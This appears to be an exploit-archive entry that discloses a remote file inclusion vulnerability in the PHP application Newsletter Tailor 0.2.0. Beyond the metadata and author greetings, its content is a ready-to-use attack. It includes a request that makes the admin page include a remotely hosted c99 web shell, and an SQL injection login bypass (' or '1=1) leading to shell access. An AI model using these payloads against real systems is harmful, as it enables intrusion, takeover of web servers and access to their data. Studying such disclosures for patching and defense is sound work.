NewsLetter Tailor 0.2.0 - Remote File Inclusion

Author: snakespc
type: webapps
platform: php
port: 
date_added: 2010-02-08 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comnewsletterTailor-0.2.0.zip

==============================================================================
[»] Newsletter Tailor Remote File Include Vulnerability
==============================================================================

[»] Script:   [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Note:     [ Thank you ViRuSMaN on script  ]

###########################################################################
 ===[ Exploit ]=== include($p.".php");

[»] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[»]Note: When you update the page prompts you to log on
[»](Auth Bypass) SQL Injection :user:' or '1=1  pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <-
###########################################################################